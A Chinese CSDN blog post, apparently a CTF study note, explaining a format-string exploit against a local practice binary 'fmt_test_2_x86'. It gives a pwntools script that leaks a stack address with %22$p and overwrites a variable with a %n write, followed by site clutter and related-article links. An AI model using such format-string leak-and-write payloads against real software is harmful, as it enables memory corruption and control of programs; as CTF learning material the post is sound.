Pwn 学习 fmt_test_2_x86 格式化字符串

最新推荐文章于 2024-10-10 16:23:05 发布
最新推荐文章于 2024-10-10 16:23:05 发布
阅读量134 收藏
点赞数
分类专栏: Pwn 文章标签: 学习 linux ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mrtreebook/article/details/126452980
版权

Pwn 学习 fmt_test_2_x86 格式化字符串

1.思路同x64

点击查看x64思路

2.不同之处

  • x86没有对齐要求
  • 接收的字节长度有所不同
  • 我们可以直接利用格式化字符串将100写入泄露地址上

3.exp

from pwn import *

context(log_level='debug', arch='amd64', os='linux')

pwnfile = './fmt_test_2_x86'

io = process(pwnfile)

payload_1 = b'%22$p'

io.recvline()

io.sendline(payload_1)

rbp_content = int(io.recv()[2:10], 16)

print("content is ", hex(rbp_content))

text3_addr = rbp_content - 0x20

print("text3_addr is ", hex(text3_addr))

payload_2 = p32(text3_addr) + b"%96c%14$n" 

# payload_2_test = p32(text3_addr) + b"%100c%10$hhn"

io.send(payload_2)

gdb.attach(io)

pause()

io.interactive()

4.运行结果

在这里插入图片描述

==Microsoft==
关注
专栏目录
[BUUCTF]PWN——axb_2019_fmt64(64位格式化字符串改got表)
mcmuyanga的博客
01-27 2710
axb_2019_fmt64 附件 步骤: 例行检查,64位程序,只开启了nx保护 本地运行看一下,可以一直输入 64位ida打开 跟axb_2019_fmt32差不多,所以还是再次利用格式化字符串漏洞通过%n来写入数据 利用过程 首先找一下偏移,偏移为8 找到偏移后我们就可以泄露libc,计算system和bin/sh了 一开始打算跟fmt32一样来泄露libcpayload = p64(puts_got)+"%08$s",失败了,动调发现被/x00截断了,64位都有这个情况,关于64位格式
Pwn 学习 fmt_str_level_1_x86 格式化字符串
MrTreebook的博客
09-07 1176
【代码】Pwn 学习 fmt_str_level_1_x86 格式化字符串
Pwn·fmt学习笔记
qq_22607673的博客
05-26 926
pwn的blind fmt
Pwn 学习 fmt_test_2格式化字符串
MrTreebook的博客
08-21 307
Pwn 学习 fmt_test_2格式化字符串
格式化字符串
m0_49959202的博客
10-29 785
文章目录格式化字符串1.原理1.1 格式化字符串介绍1.1.1 格式化字符串函数1.1.2 格式化字符串1.1.3 参数1.2 32位格式化字符串漏洞基本原理1.3 32位格式化字符串利用思路1.3.1 利用1:程序崩溃1.3.2 利用2:泄露内存1.3.2.1 泄露栈内存1.3.2.1.1 获取栈变量数值1.3.2.1.2 获取栈变量对应字符串1.3.2.2 泄露任意地址内存1.3.3 利用3:覆盖内存1.3.3.1 覆盖栈内存1.3.3.2 覆盖任意地址内存1.3.3.2.1 覆盖为小数字1.3.3.3
跟着CTF-Wiki学pwn|格式化字符串(1)
Kni9hT's Blog
05-19 2233
文章目录格式化字符串漏洞原理介绍格式化字符串函数介绍格式化字符串函数格式化字符串参数格式化字符串漏洞原理格式化字符串漏洞利用程序崩溃泄露内存泄露栈内存获取栈变量数值获取栈变量对应字符串泄露任意地址内存覆盖内存覆盖栈内存确定覆盖地址确定相对偏移进行覆盖覆盖任意地址内存覆盖小数字覆盖大数字 格式化字符串漏洞原理介绍 首先,对格式化字符串漏洞的原理进行简单介绍。 格式化字符串函数介绍 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计
格式化字符串各种泄露覆盖类型 姿势具体讲解
m0_74220442的博客
12-20 1051
栈上格式化字符串以下题目的条件:RELRO 保护模式不为 FULL RELRO ,GOT表需要可写FULL RELRO当开启这个之后 got表是无法修改的格式化字符串题目: 强网杯(ez_fmt)📎强网先锋 fmt.pdf通过这题还学会了利用 printf函数就是函数本身内部的返回地址,可以通过调试得到通过这道题理清了两个逻辑:这里我们是覆盖让地址的后四位为0x1203 这里传的是0x1203也就是4594+14+3+2 这里的4594就是%4594c 14指的就是%39$p泄露的地址0x7fffffff
PWN学习
csdn159357258456的博客
03-24 386
在程序运行过程中,堆可以提供动态分配的内存,允许程序申请大小未知的内存。堆其实就是程序虚拟地址空间的一块连续的线性区域,它由低地址向高地址方向增长。我们一般称管理堆的那部分程序为堆管理器。响应用户的申请内存请求,向操作系统申请内存,然后将其返回给用户程序。同时,为了保持内存管理的高效性,内核一般都会预先分配很大的一块连续的内存,然后让堆管理器通过某种算法管理这块内存。只有当出现了堆空间不足的情况,堆管理器才会再次与操作系统进行交互。管理用户所释放的内存。
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1133
buuctf pwn
CTF比赛PWN题sgtlibc通用快速解题框架
serfend's blog
07-07 1648
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn解题框架例题:buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例题:buuctf pwnable_orw libc-leak_x86_puts 例题:ctfshow ret2libc_64 内部赛_签到题 libc-leak_x86_write_pure 例题:buuctf jarvisoj_level1 libc-leak_x86_writ
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1476
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
从零开始学习PX4源码7(hello world)
陌城烟雨
10-10 124
本节主要记录如何在PX4中创建一个应用程序hello world 的过程,具体可以参考官网hello sky的过程hello sky。
2024年网络安全进阶学习路径-2024年进阶学习指南
2401_85026965的博客
10-10 1297
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
10.2学习
2401_87363162的博客
10-02 1185
​ Spring AOP就是基于动态代理的,如果要代理的对象,实现了某个接⼝,那么Spring AOP会使⽤JDKProxy,去创建代理对象,⽽对于没有实现接⼝的对象,就⽆法使⽤ JDK Proxy 去进⾏代理了,这时候Spring AOP会使⽤基于asm框架字节流的Cglib动态代理 ,这时候Spring AOP会使⽤ Cglib ⽣成⼀个被代理对象的⼦类来作为代理。每个线程中都有一个自己的ThreadLocalMap类对象,可以将线程自己的对象保持到其中,各管各的,线程可以正确的访问到自己的对象。
jmeter学习(7)beanshell
daxiashangxian的博客
10-06 498
打开日志选项,beanshell的log可以在日志中查看log.info("deviceId")举例:获取返回数据中的字段。
SpringCloud的学习(四)Micrometer、GateWay
最新发布
二狗mao的博客
10-10 638
步骤:新建类名xxx需要以RoutePredicateFactory结尾,并继承AbstractRoutePredicateFactory类。@Component //此注解不可忘重写apply方法@Override新建apply所需要的静态内部类MyRoutePredicateFactory.Config,这个类就是我们路由断言规则。(重要)@Validated@Setter@Getter@NotEmpty//钻、金、银等用户等级空参构造方法,内部调用super。
关于懒惰学习与渴求学习的一份介绍
2301_79096986的博客
10-04 1219
在这篇文章中,我将介绍些懒惰学习与渴求学习的算法例子,会介绍其概念、优缺点以及其python的运用。
Go基础学习10-原子并发包sync.atomic的使用:CSA、Swap、atomic.Value......
FLJS_T的博客
10-02 1174
原子操作sync.atomic以及原子变量atomic.Value详细介绍。go中原生的支持原子操作的函数支持的变量类型int32、int64、uint32、uint64、uintptr,以及unsafe包中的Pointer。对于上述原子操作类型中的每一个,可以支持的数据类型有:==int32、int64、uint32、uint64、uintptr,以及unsafe包中的Pointer。但是否sync.Mutex变量能够保证操作的原子性。atomic.Value类型是开箱即用的,我们声明一个该类型的变量
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式化字符串漏洞通常发生在使用格式化输出函数(如printf)时,输入的格式字符串中包含了未经验证的用户输入。攻击者可以通过修改格式字符串中的特殊格式标识符来读取或修改内存中的数据。 为了防止格式化字符串漏洞,开发者应该对用户输入进行严格的验证和过滤,确保输入的格式字符串没有恶意的内容。此外,可以使用安全的格式化输出函数(如snprintf)来替代不安全的输出函数,以提高代码的安全性。 如果你需要更详细的信息,请告诉我。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值